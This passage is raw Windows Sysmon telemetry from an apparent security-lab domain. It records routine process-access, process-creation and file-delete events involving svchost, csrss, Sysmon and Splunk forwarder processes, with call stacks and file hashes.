14:56:56.191{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050128Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050127Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050126Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050125Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050124Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050123Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050122Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050121Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050120Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EBB8-607E-E406-00000000BB01}364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050119Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBB8-607E-E406-00000000BB01}364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050118Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.192{85C0FFC9-EBB8-607E-E406-00000000BB01}364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000073323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:57.952{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=896D53A9B5B7D94F227E18B732700A16,SHA256=DCEFD5179D081C7CADD3B3BEEF41FEF20CD555CD497DB4845D34781ED73B79ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:57.718{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82D5E2202B6A07ED797C5683648B8F9D,SHA256=341C6E54C0BFFEB18B4FE5F5BEE3A6C3117114D3A5AE866EF9E63DFB98A00A60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:57.296{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54C3A7522500BE23E365D5203E6659EC,SHA256=7E137F4A235DCAE4C75F4D147053D8FE2E460736F391B2CAD3FD7B5B53D872EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:57.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050163Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.863{85C0FFC9-EBB9-607E-E606-00000000BB01}32922816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050162Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBB9-607E-E606-00000000BB01}3292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050161Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050160Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050159Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050158Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050157Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050156Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050155Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050154Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050153Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050152Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EBB9-607E-E606-00000000BB01}3292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050151Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:57.754{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBB9-607E-E606-00000000BB01}3292C:\Program 